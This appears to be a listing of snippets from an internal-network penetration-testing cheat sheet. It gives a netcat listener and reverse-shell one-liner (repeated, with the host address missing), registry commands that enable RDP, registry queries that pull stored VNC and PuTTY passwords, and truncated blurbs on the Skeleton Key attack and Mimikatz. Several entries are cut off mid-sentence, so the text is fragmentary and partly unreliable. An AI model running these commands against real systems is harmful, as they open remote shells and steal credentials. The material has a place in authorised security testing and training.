Internal Infrastructure Pentest - Netcat
Setup a listener: nc -lvp 4444 Connect using netcat reverse shell: nc -e /bin/sh 4444
Setup a listener: nc -lvp 4444 Connect using netcat reverse shell: nc -e /bin/sh 4444
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
reg query “HKCU\Software\ORL\WinVNC3\Password” reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query “HKCU\Software\SimonTatham\...
Skeleton Key Attack: This attack is very tricky. It makes the secondary password for the same user. Many malware takes advantage of this attack to create ...
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...